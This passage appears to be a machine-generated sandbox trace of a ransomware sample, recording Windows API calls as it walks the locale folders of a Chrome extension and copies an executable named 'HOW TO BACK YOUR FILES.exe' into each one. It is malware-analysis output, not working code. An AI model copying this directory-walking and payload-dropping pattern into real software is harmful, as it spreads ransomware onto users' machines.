ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d680d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d680d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.269] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" [0111.270] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it" [0111.270] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.270] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.270] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.271] GetLastError () returned 0x0 [0111.271] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834a7580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6a6e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6a6e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.271] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" [0111.272] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id" [0111.274] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.274] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.275] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.275] GetLastError () returned 0x0 [0111.275] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.275] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834a2760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6a6e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6a6e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.275] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" [0111.276] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu" [0111.276] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.276] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.276] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.277] GetLastError () returned 0x0 [0111.277] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.277] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83496410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6ccfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6ccfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.277] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" [0111.277] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr" [0111.277] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.278] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.278] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.278] GetLastError () returned 0x0 [0111.279] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8348c7d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6ccfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6ccfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.279] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" [0111.279] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi" [0111.279] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.279] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.280] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.280] GetLastError () returned 0x0 [0111.280] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x834852a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6f3120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6f3120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.281] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" [0111.281] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu" [0111.281] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.281] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.282] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.282] GetLastError () returned 0x0 [0111.282] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8347dd70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d6f3120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d6f3120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.282] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" [0111.283] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr" [0111.283] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.283] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.283] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.284] GetLastError () returned 0x0 [0111.284] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83476840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d719280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d719280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.284] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" [0111.284] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil" [0111.285] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.285] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.285] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.286] GetLastError () returned 0x0 [0111.286] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.286] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83467de0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d719280, 